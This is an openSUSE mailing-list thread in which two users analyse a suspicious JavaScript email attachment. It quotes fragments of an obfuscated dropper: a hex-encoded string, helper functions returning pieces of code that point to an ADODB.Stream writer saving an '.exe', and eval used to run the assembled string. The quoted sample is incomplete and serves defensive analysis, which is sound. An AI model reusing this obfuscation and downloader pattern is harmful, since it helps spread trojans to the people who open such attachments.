Carlos E. R. wrote:
On 2015-11-09 20:23, Per Jessen wrote:
Carlos E. R. wrote:
Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.
I don't know, it is code. I can't read javascript, but I'll have a guess at it.
e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();
That looks very ugly to me. But it may be only obfuscation. It seems to start with a declaration section:
var
str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55";
function y5(){return 'xa.clo';}; function c8(){return 'jet.c';}; function n9(){return ' = WS';}; function r8(){return 'ODB.Str';}; function b8(){return 'eam"); ';}; function t7(){return 'cript';}; function a2(){return 'i++) { ';}; function v2(){return 'n(fn+n+';}; function g2(){return 'eObject';}; function n1(){return 'var b';}; function e9(){return '};';}; function u7(){return '; xa.w';}; function x1(){return 'tring';}; function y7(){return '); va';}; function b9(){return '".exe",';};
function i2(){return eval;};
which declares a lot of functions (like replacement macros in C, I guess). At the end, there is another section with the actual calls:
e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l ();
I guess you didn't post all of the code? Most of those functions aren't defined above. It looks similar to this: https://www.hybrid-analysis.com/sample/3af098f396af3e6f5d56107ba443546cddda2... My guess is that it'll take you to a website for downloading a trojan. -- Per Jessen, Zürich (10.2°C) http://www.hostsuisse.com/ - dedicated server rental in Switzerland. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org